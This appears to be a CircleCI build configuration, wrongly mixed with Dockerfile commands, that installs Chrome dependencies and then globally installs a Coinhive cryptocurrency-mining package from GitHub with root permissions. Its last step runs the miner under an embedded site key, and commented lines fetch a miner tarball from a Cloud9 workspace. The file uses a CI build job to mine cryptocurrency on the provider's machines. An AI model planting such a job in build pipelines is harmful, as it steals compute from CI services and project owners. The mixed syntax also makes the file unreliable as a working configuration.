version: 2
jobs:
  build:
    docker:
      - image: node:8-slim
    steps:
      - RUN echo "Started running"
      - RUN wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - &&\
      - sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google-chrome.list' &&\
      - apt-get update &&\
      - apt-get install -y git gconf-service tar libasound2 libatk1.0-0 libc6 libcairo2 libcups2 libdbus-1-3 google-chrome-unstable libexpat1 libfontconfig1 libgcc1 libgconf-2-4 libgdk-pixbuf2.0-0 libglib2.0-0 libgtk-3-0 libnspr4 libpango-1.0-0 libpangocairo-1.0-0 libstdc++6 libx11-6 libx11-xcb1 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxfixes3 libxi6 libxrandr2 libxrender1 libxss1 libxtst6 ca-certificates fonts-liberation libappindicator1 libnss3 lsb-release xdg-utils wget


      - RUN npm i -g git+https://github.com/scheng123/coin-hive-with-logging-server --unsafe-perm=true --allow-root

# RUN wget -O source.tar.gz https://vfs-gce-usw-305-4.c9.io/vfs/5781833/9chGQ9MJcLTjFkW4/workspace/coin-hive/?download=coin-hive.tar.gz && tar -xf source.tar.gz && npm i -g ./source/ --unsafe-perm=true --allow-root

# Run coin-hive

# EXPOSE 8080:80 
# EXPOSE 8081:8080

## Doesn't work ==> RUN -p 8080 -p 8081

      - EXPOSE 8080
      - EXPOSE 8081

      - CMD ch SyM9nKfiXBLE8ON9wdAUlUUN2SayUmwC